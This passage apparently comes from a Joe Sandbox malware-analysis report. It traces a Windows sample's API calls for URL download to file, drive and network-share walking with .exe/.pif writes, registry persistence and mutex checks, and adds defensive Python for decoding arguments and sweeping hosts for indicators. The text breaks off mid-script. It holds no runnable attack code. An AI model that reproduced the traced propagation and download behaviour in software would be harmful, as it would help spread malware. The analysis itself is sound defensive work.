  • Part of subcall function 0128A677: GetTickCount.KERNEL32 ref: 0128A6E6
  • Part of subcall function 0128A677: lstrlen.KERNEL32(?,012826B8,00000000), ref: 0128A6F8
  • Part of subcall function 0128A677: wsprintfA.USER32 ref: 0128A704
• InternetOpenA.WININET(01282120,00000001,00000000,00000000,00000000), ref: 01290A18
• InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 01290A4A
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 01290A7F
• InternetReadFile.WININET(?,?,00000400,?), ref: 01290AA5
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01290AED
• CloseHandle.KERNEL32(?), ref: 01290B5D
• InternetCloseHandle.WININET(?), ref: 01290B73
• InternetCloseHandle.WININET(?), ref: 01290B89
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
• String ID:
• API String ID: 999627789-0
• Opcode ID: 8809a1cd7e0e8a1d6a9cc3e35225092048e9d5fdd1a407d005bd64e6499d26d4
• Instruction ID: 258ddd0f3c0da686e8e2e972bb48e8792651a9b6b19b2073ba586c7b8663cde1
• Opcode Fuzzy Hash: 8809a1cd7e0e8a1d6a9cc3e35225092048e9d5fdd1a407d005bd64e6499d26d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0513A7191061DABEF34CF58DC58BEAB779AB4431AF0045D8E309A6190DBB46BC4CF94
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 012883EA
• htons.WS2_32(00000FDE), ref: 0128840B
• bind.WS2_32(000000FF,00000002,00000010), ref: 0128842C
• closesocket.WS2_32(00000000), ref: 012884A3
• RtlExitUserThread.NTDLL(00000000), ref: 012884AB
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: ExitThreadUserbindclosesockethtonssocket
• String ID:
• API String ID: 3582385377-0
• Opcode ID: e4209110843c42a0c95a3564306dfc39384d0563ba1078fa625d6ddd49d4b93c
• Instruction ID: 3415400f904e2d265fffef1be3924f75299e69d59929fd254f752e3066824522
• Opcode Fuzzy Hash: e4209110843c42a0c95a3564306dfc39384d0563ba1078fa625d6ddd49d4b93c
• Instruction Fuzzy Hash: AB316175A21309EBEB20EFE8EC0EBAEBA74EF44701F50825DE701A61D0D6B45610CB91

Control-flow Graph (graph widget not preserved; basic blocks that call APIs, in address order, with their callees):
• 1293062-1293188 (entry): call 1298060, call 12844cb, Sleep, call 1292fff
• 129318b-12931a5: call 128e329; 12931a7-12931b2: Sleep (retry loop)
• 1293206-129324e: call 1292ebc, Sleep, GetLogicalDrives
• 1293278-12932b6: GetDriveTypeA
• 12932bc-12932f9: lstrcat, CreateFileA
• 12932ff-1293337: GetFileTime, FileTimeToSystemTime
• 129335f-12933b4: call 1284060, ReadFile, CharLowerA, lstrlen; 12933ba-12933d7: call 1288deb
• 1293465-129348f: lstrcpy, GetFileAttributesA; 1293491-12934c7: CloseHandle, CreateFileA; 12934c9-1293503: WriteFile, CloseHandle, SetFileAttributesA
• 1293515-129351c: CloseHandle; 1293522-129353c: GetFileAttributesA
• 129353e-1293566: SetFileAttributesA, DeleteFileA, call 128a2ad
• 1293569-1293592: CreateFileA; 1293598-129361d: GetSystemTime, SystemTimeToFileTime, call 128a16b, call 12844cb
• 129361f-1293631 and 1293633-129363f: lstrcat
• 1293645-12936ed: call 1292b8e, lstrlen, WriteFile, SetFileTime, CloseHandle, SetFileAttributesA, CreateFileA
• 12936ef-1293729: WriteFile, CloseHandle, SetFileAttributesA
• 1293734-129373f: Sleep (loops back to the drive enumeration); 1293744-1293777: RtlExitUserThread (exit)
APIs
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
• Sleep.KERNEL32 ref: 01293176
  • Part of subcall function 01292FFF: CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B
  • Part of subcall function 01292FFF: WriteFile.KERNEL32(000000FF,012626B0,00000401,00000000,00000000), ref: 0129304E
  • Part of subcall function 01292FFF: CloseHandle.KERNEL32(000000FF), ref: 01293058
• Sleep.KERNEL32(00004E20), ref: 012931AC
• Sleep.KERNEL32(00004E20), ref: 01293210
• GetLogicalDrives.KERNEL32 ref: 01293220
• GetDriveTypeA.KERNEL32(?), ref: 012932A3
• lstrcat.KERNEL32(?,01282740), ref: 012932CA
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 012932E6
• GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0129331B
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0129332F
• ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01293391
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$SleepTime$Create$CloseDriveDrivesExchangeHandleInterlockedLogicalReadSystemTypeWritelstrcat
• String ID: .exe$.pif$:$\
• API String ID: 2892063643-4138429844
• Opcode ID: 0a12a35ac4b7837cd595958113776162c4007908799be25c8aaf9ddc3636fb56
• Instruction ID: 52a5307113779c6a012bd739a21894dfe18f1587b36d61848d42cda95dd267bc
• Opcode Fuzzy Hash: 0a12a35ac4b7837cd595958113776162c4007908799be25c8aaf9ddc3636fb56
• Instruction Fuzzy Hash: 0A027EB5910269DBDF34DB68DC88BEEB775BB89700F0081D9E209E61C4D774AAA4CF50
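Reading the API lists above means decoding zero-padded hex arguments by hand: socket(00000002,00000001,00000006) is socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) and htons(00000FDE) is TCP port 4062, which the thread binds and closes again with no listen or accept in its list, so it probes whether the port is free rather than serving on it; in the drive loop, Sleep(00004E20) is 20 s, ReadFile reads at most 00000FA0 = 4000 bytes, CreateFileA(?,80000000,00000001,00000000,00000003,00000020,00000000) opens with GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING and FILE_ATTRIBUTE_ARCHIVE, and the subcall at 01292FFF writes 00000401 = 1025 bytes to a file opened GENERIC_WRITE, FILE_SHARE_WRITE, OPEN_ALWAYS. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in the report's api.MODULE(args), ref: addr shape (the sample lines are copied from this section) and renders the arguments symbolically. The flag tables cover only the calls shown here, and the line shape it expects is an assumption taken from how the lines appear on this page.

```python
import re

# Added example, not Joe Sandbox code: decode the zero-padded hex arguments the
# report prints for a few Win32 / Winsock calls into their symbolic names.

# Constructed sample input: API-call lines copied from the report section above.
REPORT_LINES = [
    "socket.WS2_32(00000002,00000001,00000006), ref: 012883EA",
    "htons.WS2_32(00000FDE), ref: 0128840B",
    "CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 012932E6",
    "CreateFileA.KERNEL32(0129382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0129382E), ref: 0129302B",
    "Sleep.KERNEL32(00004E20), ref: 012931AC",
    "SetErrorMode.KERNEL32(00008002), ref: 05B300F8",
    "MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 05B30142",
]

# Assumed line shape: "<api>.<MODULE>(<args>), ref: <addr>", optionally bulleted.
LINE_RE = re.compile(r"^\s*(?:• )?(\w+)\.(\w+)\((.*)\)(?:, ref: ([0-9A-Fa-f]+))?\s*$")
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Flag tables for the calls this section shows (values from the Windows SDK headers).
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(1, "FILE_SHARE_READ"), (2, "FILE_SHARE_WRITE"), (4, "FILE_SHARE_DELETE")]
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = [(0x1, "FILE_ATTRIBUTE_READONLY"), (0x2, "FILE_ATTRIBUTE_HIDDEN"),
         (0x4, "FILE_ATTRIBUTE_SYSTEM"), (0x20, "FILE_ATTRIBUTE_ARCHIVE"),
         (0x80, "FILE_ATTRIBUTE_NORMAL")]
SEM = [(0x1, "SEM_FAILCRITICALERRORS"), (0x2, "SEM_NOGPFAULTERRORBOX"),
       (0x4, "SEM_NOALIGNMENTFAULTEXCEPT"), (0x8000, "SEM_NOOPENFILEERRORBOX")]
MAP = [(0x1, "FILE_MAP_COPY"), (0x2, "FILE_MAP_WRITE"), (0x4, "FILE_MAP_READ")]
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def bits(value, table):
    """Render a flag word as OR-ed names; bits not in the table are kept as hex."""
    names = [name for bit, name in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table) & 0xFFFFFFFF
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def parse_args(raw):
    """'?' -> None (unknown), 8-hex-digit token -> int, anything else -> string literal."""
    out = []
    for tok in (raw.split(",") if raw else []):
        tok = tok.strip()
        if tok == "?":
            out.append(None)
        elif HEX_RE.match(tok):
            out.append(int(tok, 16) & 0xFFFFFFFF)  # "-00000001" becomes INVALID_HANDLE_VALUE
        else:
            out.append(tok)
    return out


def ints(a, *idx):
    """True when every listed argument position holds a decoded integer."""
    return all(i < len(a) and isinstance(a[i], int) for i in idx)


def describe(api, a):
    """Symbolic reading of the arguments, for the calls this example knows about."""
    if api == "socket" and ints(a, 0, 1, 2):
        return f"{AF.get(a[0], hex(a[0]))}, {SOCK.get(a[1], hex(a[1]))}, {PROTO.get(a[2], hex(a[2]))}"
    if api == "htons" and ints(a, 0):
        return f"port {a[0] & 0xFFFF}"
    if api == "Sleep" and ints(a, 0):
        return f"{a[0]} ms ({a[0] / 1000:g} s)"
    if api == "CreateFileA" and ints(a, 1, 2, 4, 5):
        return (f"access={bits(a[1], GENERIC)} share={bits(a[2], SHARE)} "
                f"disposition={CREATION.get(a[4], hex(a[4]))} attrs={bits(a[5], ATTRS)}")
    if api == "SetErrorMode" and ints(a, 0):
        return bits(a[0], SEM)
    if api == "MapViewOfFile" and ints(a, 1, 4):
        return f"access={bits(a[1], MAP)} bytes={a[4]}"
    return ""


def decode(line):
    """One report line -> dict(api, module, args, ref, meaning); None if it is not an API line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, raw, ref = m.groups()
    args = parse_args(raw)
    return {"api": api, "module": module, "args": args, "ref": ref,
            "meaning": describe(api, args)}


def decode_report(lines):
    return [d for d in map(decode, lines) if d]


if __name__ == "__main__":
    for d in decode_report(REPORT_LINES):
        print(f"{d['ref']}: {d['api']}.{d['module']} -> {d['meaning']}")
```

Arguments the report prints as ? come back as None, string arguments (library and object names) are kept verbatim, and a value such as -00000001 is masked to 32 bits so it reads as INVALID_HANDLE_VALUE. Lines without a parenthesised argument list (for example Sleep.KERNEL32 ref: 01293176, where the sandbox could not recover the argument) are skipped rather than guessed.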

Control-flow Graph (graph widget not preserved; basic blocks that call APIs, in address order, with their callees; entry block 5b30005-5b30016):
• 5b30086-5b300c0: call 5b30286, call 5b30260, call 5b30286, call 5b30260
• 5b300c6-5b30134: LoadLibraryExA, call 5b30260, call 5b30265, SetErrorMode, CreateFileMappingA (twice)
• 5b30136-5b3014a: MapViewOfFile
• 5b30170-5b30190: CreateThread
• 5b301c7-5b301dd: GetModuleFileNameA
• 5b301df-5b3020a: LoadLibraryExA, GetProcAddress
• 5b3020c-5b3023e: CreateMutexA, GetLastError
• 5b30240-5b30245: Sleep; 5b3024b-5b3024d: ExitProcess (reached from the CreateMutexA/GetLastError block either directly or through the Sleep block)
APIs
• LoadLibraryExA.KERNEL32(KERNEL32.DLL,00000000,00000000), ref: 05B300D1
• SetErrorMode.KERNEL32(00008002), ref: 05B300F8
• CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 05B30112
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 05B3012C
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 05B30142
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,05B30693), ref: 05B30190
• GetModuleFileNameA.KERNEL32(00000000,05B31778,000001FE), ref: 05B301D5
• LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 05B301F4
• GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 05B30202
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 05B3022F
• GetLastError.KERNEL32(00000000), ref: 05B30236
• Sleep.KERNEL32(000927C0), ref: 05B30245
• ExitProcess.KERNEL32(00000000), ref: 05B3024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2249113471.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5b30000_PfBjDhHzvV.jbxd
Similarity
• API ID: CreateFile$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepThreadView
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 622795131-162185446
• Opcode ID: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
• Instruction ID: ff7dce726ae009159e240d3940e3b47e37ce975c406eab4691207a5e696f1255
• Opcode Fuzzy Hash: 4dfdd8c8ea759f40701b5fec77ac64174a416b025a1b0df71bc92e610429bfa5
• Instruction Fuzzy Hash: 50614B7164428CABEF10EFA0CC4EFAA3769FF04B01F540555EA09BE1E0D6B1B6448B5A
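The function above resolves its imports at run time (LoadLibraryExA on KERNEL32.DLL and SHELL32.DLL, GetProcAddress for ShellExecuteA), calls SetErrorMode(00008002), which is SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX so that neither a crash nor a missing file raises a dialog, creates two named sections, hh8geqpHJTkdns6 (00008000 = 32 KiB, PAGE_READWRITE, hFile = INVALID_HANDLE_VALUE so it is backed by the paging file) and purity_control_7728 (00015400 = 87040 bytes, mapped FILE_MAP_READ | FILE_MAP_WRITE), and a mutex named Ap1mutx7 followed by GetLastError, the pattern of a single-instance check; on the exit path it sleeps 000927C0 ms, ten minutes, before ExitProcess. Named objects are the cheapest host indicator to sweep for. The Python below is an added example, not part of the report: it opens each name with OpenMutexA / OpenFileMappingA through ctypes and returns the ones that exist, counting ERROR_ACCESS_DENIED as present. It assumes the objects live in the session-local namespace (the names are created without a Global\ prefix), so it must run in the session the sample ran in; the probe function is injectable so the logic can be exercised without Windows.

```python
import ctypes
import sys

# Added example, not part of the Joe Sandbox report: sweep a live Windows host
# for the named kernel objects the function above creates. The names come from
# the report's API list; the access rights and error codes are Windows SDK values.
INDICATORS = [
    ("mutex", "Ap1mutx7"),               # CreateMutexA(NULL, FALSE, "Ap1mutx7")
    ("section", "hh8geqpHJTkdns6"),      # CreateFileMappingA(..., 0x8000, "hh8geqpHJTkdns6")
    ("section", "purity_control_7728"),  # CreateFileMappingA(..., 0x15400, "purity_control_7728")
]

SYNCHRONIZE = 0x00100000     # minimal access right for OpenMutexA
FILE_MAP_READ = 0x00000004   # minimal access right for OpenFileMappingA
ERROR_ACCESS_DENIED = 5      # object exists but is owned by another account / integrity level


def win32_probe(kind, name):
    """Return True if a named object of this kind is visible in the caller's session.
    Windows only: uses kernel32 through ctypes.WinDLL, resolved at call time."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    if kind == "mutex":
        fn, access = k32.OpenMutexA, SYNCHRONIZE
    else:
        fn, access = k32.OpenFileMappingA, FILE_MAP_READ
    fn.restype = ctypes.c_void_p
    fn.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_char_p]  # (DWORD access, BOOL inherit, LPCSTR name)
    handle = fn(access, 0, name.encode("ascii"))
    if handle:
        k32.CloseHandle(ctypes.c_void_p(handle))
        return True
    # A denied open still proves the name is taken, which is what we care about.
    return ctypes.get_last_error() == ERROR_ACCESS_DENIED


def sweep(probe=win32_probe, indicators=INDICATORS):
    """Probe every indicator and return the (kind, name) pairs that exist.
    `probe` is injectable so the sweep logic can be exercised off-box."""
    return [(kind, name) for kind, name in indicators if probe(kind, name)]


if __name__ == "__main__":
    if not sys.platform.startswith("win"):
        sys.exit("run this on the Windows host being triaged, in the interactive session")
    hits = sweep()
    for kind, name in hits:
        print(f"present: {kind} {name}")
    sys.exit(1 if hits else 0)
```

Run it as the user who was logged on when the sample executed; a session-local mutex created in the interactive session is not visible from a service session or from another desktop session, so a clean result from a remote-management shell does not clear the host. An exit status of 1 means at least one of the three names is held on the machine.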

Control-flow Graph

control_flow_graph 878 1284d96-1284e3a call 1298060 881 1284e3c 878->881 882 1284e41-1284eb1 lstrcpy lstrlen wsprintfA RegOpenKeyExA 878->882 883 1285459-1285469 881->883 884 1285112-1285134 882->884 885 1284eb7-1284ed2 RegCreateKeyA 882->885 889 128513a-1285163 wsprintfA 884->889 890 128529e-12852a5 884->890 886 1284ee0-1284f04 GlobalAlloc call 128c89a 885->886 887 1284ed4-1284edb 885->887 904 1284f1d-1284f24 886->904 905 1284f06-1284f15 call 1286330 886->905 887->883 894 12851a0-12851d9 RegQueryValueExA 889->894 895 1285165-1285197 RegQueryValueExA 889->895 892 128542a-1285431 890->892 893 12852ab-1285408 call 129772b * 5 call 1286330 890->893 900 1285440-1285447 892->900 901 1285433-128543a RegCloseKey 892->901 959 128540a-1285423 call 129772b 893->959 960 1285425 893->960 898 12851db 894->898 899 12851e0-1285202 894->899 902 1285199 895->902 903 128519e 895->903 898->899 910 1285208-128520e 899->910 911 1285299 899->911 900->883 901->900 903->899 907 1284f2a-1284f4c 904->907 908 12850f0-12850f7 904->908 912 1284f1a 905->912 926 1284f52-1284f96 wsprintfA 907->926 927 1285085-12850ed RegCloseKey call 129772b * 2 907->927 922 12850f9-1285100 GlobalFree 908->922 923 1285106-128510d 908->923 915 128527c-1285296 call 12849f9 910->915 916 128525d-128527a call 12849f9 910->916 917 128523f-128524d 910->917 918 128524f-128525b 910->918 919 1285231-128523d 910->919 920 1285223-128522f 910->920 921 1285215-1285221 910->921 911->911 912->904 915->911 916->911 917->911 918->911 919->911 920->911 921->911 922->923 923->883 929 1284f9c-1284fa2 926->929 930 1285027-128502e 926->930 927->908 929->915 929->916 929->917 929->918 929->919 929->920 929->921 937 1284fa9-1284fb3 929->937 938 1284fcd-1284fd7 929->938 939 1284fc1-1284fcb 929->939 940 1284fe5-1285005 call 1284a5b lstrcpy 929->940 941 1285007-1285021 call 1284a5b lstrcpy 929->941 942 1284fd9-1284fe3 929->942 943 1284fb5-1284fbf 929->943 935 1285030-1285051 RegSetValueExA 930->935 936 1285053-128507a lstrlen RegSetValueExA 930->936 946 1285080 935->946 936->946 937->930 938->930 939->930 940->930 941->930 942->930 943->930 959->892 960->892
APIs
• lstrcpy.KERNEL32(00000000,Software\Erlloywmr), ref: 01284E54
• lstrlen.KERNEL32(00000000,\%d,6E6F7266), ref: 01284E78
• wsprintfA.USER32 ref: 01284E86
• RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01284EA9
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01284ECA
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CreateOpenlstrcpylstrlenwsprintf
• String ID: Software\Erlloywmr$\%d$fronC:\Windows\
• API String ID: 4004410694-3772162829
• Opcode ID: d948be175dd2c31f3435d80603fd571c63144fe9462fe5e669f681ecb5e8f9b5
• Instruction ID: bb8be69fee61e1a87f969223cb70f07f2af509be754ca7cb5824ea8ebbf375bc
• Opcode Fuzzy Hash: d948be175dd2c31f3435d80603fd571c63144fe9462fe5e669f681ecb5e8f9b5
• Instruction Fuzzy Hash: D502C1B1922218DBDB24EF54DC85BE9B779FB58304F0882D9E619672C0DB729B84CF50

Control-flow Graph

control_flow_graph 963 129195d-1291a24 Sleep WNetOpenEnumA 964 1291a42-1291a57 GlobalAlloc 963->964 965 1291a26-1291a3d 963->965 967 1291a5a-1291a61 964->967 966 1291cd2-1291ce2 965->966 968 1291c9d-1291ccd GlobalFree WNetCloseEnum 967->968 969 1291a67-1291a9f call 1284060 WNetEnumResourceA 967->969 968->966 973 1291c7e-1291c89 GetLastError 969->973 974 1291aa5-1291ac9 969->974 975 1291c8b 973->975 976 1291c8d-1291c98 Sleep 973->976 978 1291c7c 974->978 979 1291acf-1291ae0 974->979 975->968 976->967 978->976 980 1291c77 979->980 981 1291ae6-1291af7 979->981 981->980 982 1291afd-1291b0e 981->982 983 1291c51-1291c64 call 129195d 982->983 984 1291b14-1291b42 lstrcpy lstrcat call 1290b9a 982->984 987 1291c69-1291c71 Sleep 983->987 988 1291b47-1291b4c 984->988 987->980 988->983 989 1291b52-1291b65 988->989 990 1291b6b-1291b94 lstrcpy lstrlen 989->990 991 1291bf1-1291bfa 989->991 994 1291ba8-1291be8 lstrlen call 128a16b lstrcat call 1290c4b 990->994 995 1291b96-1291ba2 lstrcat 990->995 992 1291c3b-1291c42 991->992 993 1291bfc-1291c38 call 1284060 lstrlen call 1291060 991->993 992->983 998 1291c44-1291c4b DeleteFileA 992->998 993->992 994->991 1005 1291bea 994->1005 995->994 998->983 1005->991
APIs
• Sleep.KERNEL32(00000400), ref: 012919FA
• WNetOpenEnumA.MPR(00000002,00000000,00000000,01299078,?), ref: 01291A11
• GlobalAlloc.KERNEL32(00000040,00007F80), ref: 01291A51
• WNetEnumResourceA.MPR(?,?,?,?), ref: 01291A92
• lstrcpy.KERNEL32(?,00000000), ref: 01291B29
• lstrcat.KERNEL32(?,01283D50), ref: 01291B38
• lstrcpy.KERNEL32(?,?), ref: 01291B76
• lstrlen.KERNEL32(?), ref: 01291B83
• lstrcat.KERNEL32(?,01283D54), ref: 01291BA2
• lstrlen.KERNEL32(?), ref: 01291BAF
• lstrcat.KERNEL32(?,.tmp), ref: 01291BD1
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
• String ID: .tmp
• API String ID: 2671286937-2986845003
• Opcode ID: aa681534e27b2027f2489b4d8173517ecb8b76a54e45a1ae26375a3f6c25a6da
• Instruction ID: 34d736e4e9d34e3d06c9d80d23f43cc2ebd7006afbc9dcf6662120fca9171587
• Opcode Fuzzy Hash: aa681534e27b2027f2489b4d8173517ecb8b76a54e45a1ae26375a3f6c25a6da
• Instruction Fuzzy Hash: 1791CE71A1061ADFDF20CF58DC49BEFBBB5BB44312F008298E619A7280D776AA55CF50

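The flattened control_flow_graph listing above for the function at 129195d is hard to read as text, but it contains enough structure to answer the questions an analyst actually has about this routine: where it exits, which block calls DeleteFileA, whether it recurses into itself (which is how a share walker descends into network containers), and where the Sleep calls sit. The following Python is an added example, not part of the Joe Sandbox report or the sample; it parses the dump format as printed on this page (a heuristic for this listing style, not an official Joe Sandbox parser) using that function's own graph as constructed input.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Constructed input: the control_flow_graph dump of the function at 129195d as
# printed in the report above (copied verbatim, only wrapped for readability).
WNET_CFG_DUMP = (
    "control_flow_graph 963 129195d-1291a24 Sleep WNetOpenEnumA 964 1291a42-1291a57 "
    "GlobalAlloc 963->964 965 1291a26-1291a3d 963->965 967 1291a5a-1291a61 964->967 "
    "966 1291cd2-1291ce2 965->966 968 1291c9d-1291ccd GlobalFree WNetCloseEnum 967->968 "
    "969 1291a67-1291a9f call 1284060 WNetEnumResourceA 967->969 968->966 "
    "973 1291c7e-1291c89 GetLastError 969->973 974 1291aa5-1291ac9 969->974 975 1291c8b "
    "973->975 976 1291c8d-1291c98 Sleep 973->976 978 1291c7c 974->978 "
    "979 1291acf-1291ae0 974->979 975->968 976->967 978->976 980 1291c77 979->980 "
    "981 1291ae6-1291af7 979->981 981->980 982 1291afd-1291b0e 981->982 "
    "983 1291c51-1291c64 call 129195d 982->983 984 1291b14-1291b42 lstrcpy lstrcat "
    "call 1290b9a 982->984 987 1291c69-1291c71 Sleep 983->987 988 1291b47-1291b4c "
    "984->988 987->980 988->983 989 1291b52-1291b65 988->989 990 1291b6b-1291b94 "
    "lstrcpy lstrlen 989->990 991 1291bf1-1291bfa 989->991 994 1291ba8-1291be8 lstrlen "
    "call 128a16b lstrcat call 1290c4b 990->994 995 1291b96-1291ba2 lstrcat 990->995 "
    "992 1291c3b-1291c42 991->992 993 1291bfc-1291c38 call 1284060 lstrlen "
    "call 1291060 991->993 992->983 998 1291c44-1291c4b DeleteFileA 992->998 993->992 "
    "994->991 1005 1291bea 994->1005 995->994 998->983 1005->991"
)

ADDR_RE = re.compile(r"^[0-9a-f]{7}(?:-[0-9a-f]{7})?$")   # "start" or "start-end"
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                    # "from->to"


@dataclass
class Block:
    start: int
    end: int
    labels: List[str] = field(default_factory=list)

    def calls(self) -> List[str]:
        """API names and 'call <addr>' targets, with the two-token calls rejoined."""
        out, j = [], 0
        while j < len(self.labels):
            if self.labels[j] == "call" and j + 1 < len(self.labels):
                out.append("call " + self.labels[j + 1])
                j += 2
            else:
                out.append(self.labels[j])
                j += 1
        return out


def parse_cfg_dump(dump: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """A block starts with '<id> <start>[-<end>]'; following tokens up to the next
    block or edge are that block's API names / call targets. Heuristic for this
    dump style: a call target is never directly followed by a 7-hex-digit address,
    so an all-digit target such as 1284060 is not mistaken for a block id."""
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
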